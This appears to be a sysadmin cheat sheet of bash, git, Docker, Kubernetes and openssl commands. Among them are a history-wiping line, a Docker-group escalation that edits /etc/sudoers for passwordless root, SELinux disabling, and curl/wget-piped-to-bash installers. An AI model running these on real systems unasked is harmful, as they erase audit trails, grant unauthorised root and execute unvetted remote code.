Delete history and exit bash
cat /dev/null > ~/.bash_history && history -c && exit
Print all uncommented config file lines (without the empty ones)
cat file.txt | egrep -v '^#|^$'
Delete files older than 1 year
find /var/log/httpd/ -mtime +365 -exec rm {} \;
Append multiple lines to file
cat <<EOF >> /etc/hosts
10.135.77.134 node1
10.135.77.135 node2
10.135.77.177 node3
EOF
Append multiple lines to file as root
sudo bash -c 'cat <<EOF >> /etc/hosts
10.135.77.134 node1
10.135.77.135 node2
10.135.77.177 node3
EOF'
Search and replace pattern in file
sed -i 's/mon_host = .*/mon_host = 8.8.8.8/g' ceph.conf
Search and replace pattern in file with input from STDIN
cat cacerts.pem | tr -d '\n' | base64 -w 0 | xargs --replace=INSERTED -- sed -i ./ansible-rancher/inventories/host_vars/cluster_rancher.yml -e 's/rke_rancher_tls_cacerts.*/rke_rancher_tls_cacerts: "INSERTED"/g'
Rsync files to remote host over SSH
rsync -avzP -e "ssh -i /root/.ssh/id_rsa_my_ssh_pub_key" /opt/data/* <REMOTE_USER>@<REMOTE_IP>:/opt/data/
SSH via jumpserver in a single command
ssh -i ~/.ssh/id_rsa_example_key \
-o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
-o IdentitiesOnly=yes \
-o 'ProxyCommand=ssh -W %h:%p \
-i ~/.ssh/id_rsa_example_key \
-o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
-o IdentitiesOnly=yes \
<jumpserver-user>@<jumpserver-ip>' \
<target-server-user>@<target-server-IP>
Count all files in the current and it's directory
find . -type f | wc -l
Print amount of open files per process (sorted)
for pid in /proc/[0-9]*;
do
p=$(basename $pid)
printf "%4d FDs for PID %6d; command=%s\n" $(ls $pid/fd | wc -l) $p "$(ps -p $p -o comm=)"
done | sort -nr
Bulletproof copy command (also takes care of permissions and file modes)
(cd /opt/<SOURCE_PATH>; tar -cf - .) | (cd /mnt/<DESTINATION_PATH>; tar -xpf -)
Set Executable Bit on Windows
git update-index --chmod=+x <filename.sh>
Git rebase (get the newest master commits into the feature branch)
# Get newest changes:
git fetch
# Start interactive rebase in feature branch:
git checkout my_awesome_feature
git rebase -i origin/master
# Manually resolve merge conflicts & "git add" the resolved merge conflict files
git add *
# Check if the latest master commit comes right before the first feature branch commit:
git log
# If the git log is correct, force push the feature branch to the origin:
git push --force origin my_awesome_feature
Change last Git commits' timestamp to the current one
GIT_COMMITTER_DATE="$(date)" git commit --amend --no-edit --date "$(date)"
Change Git remote URL of existing origin
remote
git remote -v
git remote set-url origin [email protected]:<new-remote-repo>.git
Convert Putty format SSH public key to OpenSSH format
ssh-keygen -i -f PuttyStyle_PublicKey.pub > OpenSSHStyle_PublicKey.pub
Run a command every X seconds
watch -n X 'redis-cli info | grep connected_clients'
Get public IP from CLI
wget -qO - icanhazip.com
Adding new disk
pvcreate /dev/sdb
vgcreate vg1-nfs /dev/sdb
lvcreate -l 100%FREE -n data vg1-nfs
mkfs.ext4 /dev/vg1-nfs/data
mkdir /nfs
Generate self-signed certificate in single command
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -days 3650 -subj "/C=CH/ST=Zurich/L=Zurich/O=Example Inc./OU=IT/CN=git.example.com"
Generate CA & server cert, sign server cert with CA key
# Generate root CA cert and key
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout ca.key -out ca.crt -days 3650 -subj "/C=CH/ST=Zurich/L=Zurich/O=Example Inc./OU=IT/CN=My Awesome Root CA"
# Generate server cert request and key
openssl req -new -newkey rsa:4096 -sha256 -nodes -keyout tls.key -out tls.csr -days 3650 -subj "/C=CH/ST=Zurich/L=Zurich/O=Example Inc./OU=IT/CN=git.example.com"
# Sign server cert request with CA
openssl x509 -req -in tls.csr -set_serial 1000 -CA ca.crt -CAkey ca.key -days 3650 -out tls.crt
# Validate the signature
openssl verify -verbose -CAfile ca.crt tls.crt
Enable sudo access for 720 minutes without re-entering the password
sudo sed -i 's/Defaults.*env_reset$/Defaults env_reset, timestamp_timeout=720/g' /etc/sudoers
Show all OOM killed processes
dmesg -T | egrep -i 'killed process'
Small, manual load test using curl
for i in {1..100}; do
curl -s -o /dev/null https://my-example-url.com
sleep 0.1
done
Check write speed of a disk (via mountpoint, without cache)
dd if=/dev/zero of=/mnt/mountxy.img bs=1G count=1 oflag=dsync
Check read speed of a disk (without cache)
hdparm -tT --direct /dev/sda
Set restrictive permissions on Apache HTTPD DocumentRoot
cd /var/www/html/...
chown -R apache:apache .
find . -type d -exec chmod 0570 {} \;
find . -type f -exec chmod 0460 {} \;
sestatus
setenforce 0
sed -i --follow-symlinks 's/^SELINUX=.*/SELINUX=permissive/g' /etc/sysconfig/selinux && cat /etc/sysconfig/selinux
sestatus
Attention Only works if the current user has the permission to run Docker containers!
docker run --rm -it -u root -v /etc/sudoers:/tmp/sudoers alpine /bin/sh
apk add --no-cache vim
vim /tmp/sudoers
# Add the following line after the last "%sudo" line (last one overrides all "%sudo"-lines before)
%sudo ALL=(ALL) NOPASSWD: ALL
# Exit vim using ":wq!"
# Exit the containers:
exit
# Get Root on the host system (no password prompt should appear):
sudo su
Building container images using buildah
and traditional Dockerfile
s:
buildah login docker.io
buildah bud -t docker.io/<org_or_username>/<image_name>:<image_tag> .
buildah push docker.io/<org_or_username>/<image_name>:<image_tag>
# Create a Docker Buildx builder instance for multi-arch builds:
docker buildx create --name multiarch-builder --use --bootstrap
# Build the actual image and load it to the local Docker image cache:
docker buildx build --load --no-cache --tag <image-name>:1.0 .
# Build the actual image and push it to the quay.io image registry:
docker buildx build --push --platform linux/arm64,linux/amd64 --tag quay.io/<your-username-here>/<image-name>:latest .
E.g. sorted by most memory used:
docker stats --no-stream --format "table {{.Name}}\t{{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}" | (sed -u 1q; sort -k 4 -rh)
wget -O - https://gist.githubusercontent.com/wdullaer/f1af16bd7e970389bad3/raw/install.sh| bash
see https://gist.github.com/wdullaer/f1af16bd7e970389bad3 for details
curl -fsSL get.docker.com -o - | bash
systemctl enable docker
systemctl start docker
yum install epel-release
yum update -y
yum install python-pip
pip install docker-compose
crontab -l | { cat; echo "0 3 * * * /bin/docker pull spotify/docker-gc:latest && /bin/docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -v /etc:/etc:ro -e REMOVE_VOLUMES=1 spotify/docker-gc:latest"; } | crontab -
Note: Ensure docker
s path is /bin/docker
. If it's not, change the path in the statement above.
docker stop $(docker ps -a -q)
docker rm $(docker ps -a -q)
docker rmi $(docker images -q)
Backup:
docker image save puzzle/keepalived:2.0.19 > puzzle_keepalived_2_0_19_backup.tar
# or
docker image save puzzle/keepalived:2.0.19 | gzip > puzzle_keepalived_2_0_19_backup.tar.gz
Restore:
docker load -i puzzle_keepalived_2_0_19_backup.tar
# or
docker load -i puzzle_keepalived_2_0_19_backup.tar.gz
cat <<EOF >> /etc/docker/daemon.json
{
"default-address-pools":
[
{"base":"10.0.0.0/8","size":27}
]
}
EOF
systemctl restart docker
Attention: All Docker containers, images, networks, volumes, running states, etc. are lost after the Docker storage driver and the data root are changed! If you do not want to lose any Docker related data, just copy it from the origin (by default /var/lib/docker
) to the new partition (in this example /opt/docker
) before you start the Docker daemon back again.
systemctl stop docker
pvcreate /dev/sdb
vgcreate vg1-docker /dev/sdb
lvcreate -l 100%FREE -n docker vg1-docker
mkfs.xfs -n ftype=1 /dev/vg1-docker/docker
mkdir /opt/docker
cat <<EOF >> /etc/fstab
/dev/vg1-docker/docker /opt/docker xfs defaults 0 0
EOF
cat <<EOF >> /etc/docker/daemon.json
{
"storage-driver": "overlay2",
"data-root": "/opt/docker/"
}
EOF
systemctl start docker
# On the master:
docker swarm init --advertise-addr <internal-master-IP> --data-path-addr <external-master-IP> --default-addr-pool 10.254.0.0/15 --default-addr-pool-mask-length 27
# On the worker1:
docker swarm join --advertise-addr <internal-worker1-IP> --data-path-addr <external-worker1-IP> --token <swarm-worker-join-token> <internal-master-IP>:2377
# On the workerX:
docker swarm join --advertise-addr <internal-workerX-IP> --data-path-addr <external-workerX-IP> --token <swarm-worker-join-token> <internal-master-IP>:2377
[user@node01 ~]$ docker service update --force --image dchevell/jira-software:8.2 jira
jira
overall progress: 1 out of 1 tasks
1/1: running [==================================================>]
verify: Service converged
[user@node01 ~]$ docker service inspect jira -f "{{.Spec.TaskTemplate.ContainerSpec.Image}}"
dchevell/jira-software:8.2@sha256:17e195aebfdb8e0606e87acf1d26b329af32e09e440b8f31ba2b233eaa093ada
Use --force
when the tag of the new Docker image itself didn't change.
Get an overview
kubectl cluster-info
kubectl get componentstatuses
kubectl api-versions
kubectl get all -A -o wide --show-labels=true
Explain fields of a specific resource (level)
kubectl explain deployments.spec.template.spec.containers
Filter YAML output using Go templates
kubectl get -n my-ns secret my-awesome-secret -o go-template='{{index .data "cluster.conf" | base64decode }}'
# or
kubectl get -n my-ns secret my-awesome-secret -o go-template='{{.metadata.creationTimestamp | base64decode }}'
Find remaining resources which cause Namespace deletion being stuck
kubectl api-resources --verbs=list --namespaced -o name \
| xargs -n 1 kubectl get --show-kind --ignore-not-found -n <namespace>
Note: When a resource isn't properly deleted even when "force deletion" is used, check if the regarding resource has finalizers configured which can't complete. In such a case, edit the regarding resource and remove the finalizer YAML part.
Show all failing pods (helpful to see before cluster upgrades etc.)
alias fpods='kubectl get pods -A -o wide | grep -v '\''1/1'\'' | grep -v '\''2/2'\'' | grep -v '\''3/3'\'' | grep -v '\''4/4'\'' | grep -v '\''5/5'\'' | grep -v '\''6/6'\'' | grep -v Completed'
Print all pods and their image (format: <namespace>/<pod>: <image>
)
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"/"}{.metadata.name}{": "}{.spec.containers[*].image}{"\n"}' | tr "\n" "\n" | sort -u
Add a debug container to a pod (e.g. when the pod image has no userspace (sh, bash, etc.)). Only works on K8s 1.23+.
kubectl debug -it <pod-name> --image nicolaka/netshoot:latest --target <container-inside-pod>
Troubleshooting Pod running in hostNetwork
k run -it --rm --image nicolaka/netshoot --overrides='{"spec": {"hostNetwork": true}}' tshoot -- /bin/bash
Delete all pods within the current Namespace which are not in the Running state
kubectl get pods --no-headers=true | grep -v Running | awk '{print $1}' | xargs kubectl delete pod
https://kubernetes.io/docs/concepts/workloads/pods/ephemeral-containers/
Show diff between Helm release revisions
vimdiff <(helm get values prometheus-operator --revision 14) <(helm get values prometheus-operator --revision 13)
Download all images from a Helm chart
# Get `yq_darwin_arm64` from https://github.com/mikefarah/yq
helm pull <repo>/<chart-name> --version <version>
helm template -f <my-helm-values>.yaml <chart-name>.tgz | ./yq_darwin_arm64 -Nr '[.. | select(has("image")).image]' | sed -ne '/^- / s/^- "\(.*\)"$/\1/p' | sort -u
# Define IMAGES array with output'ed images:
# Define image array:
IMAGES=(
quay.io/....
docker.io/library/...
)
# Pull all images:
for IMAGE in ${IMAGES[@]}; do
docker pull --platform x86_64 $IMAGE
# Alternatively, something like this should to the trick to directly mirror the images to a custom registry:
#skopeo copy --multi-arch all docker://$IMAGE docker://harbor.example.com/project/$IMAGE
done
- Minimize Docker image size:
- Demystifying Containers
- Container Networking:
- https://dustinspecker.com/posts/how-do-kubernetes-and-docker-create-ip-addresses/
- https://dustinspecker.com/posts/iptables-how-docker-publishes-ports/
- https://dustinspecker.com/posts/iptables-how-kubernetes-services-direct-traffic-to-pods/
- https://dustinspecker.com/posts/ipvs-how-kubernetes-services-direct-traffic-to-pods/
- Working with Kubernetes API blog post series:
- Get dynamic Docker image: https://nixery.dev/
- Network Policy Viewer: https://orca.tufin.io/netpol/
- Make private cluster publicly available (using inlets, https://docs.inlets.dev/#/): https://blog.alexellis.io/ingress-for-your-local-kubernetes-cluster/
- Buildah, Podman & Skopeo: https://www.redhat.com/en/blog/say-hello-buildah-podman-and-skopeo
Check the log of a process if the process itself does not deliver sufficient logs:
strace -p <PID-of-process> -s9999 write
Note: As <PID-of-process>
also PID's from processes, which are running inside a Docker container, can be used. This is very helpful to debug dockerized processes which does not deliver sufficient logs.
Hint: Install perf via linux-tools
. The perf
version needs to match the kernel version!
Record data:
perf_4.9 record -F 100 -p <PID>
View recorded usage data:
perf_4.9 report
Permanently add ssh key to keychain
<details open>
<summary>Dropdown title</summary>
<pre> // <- this is optional
Very loooong text here
</details>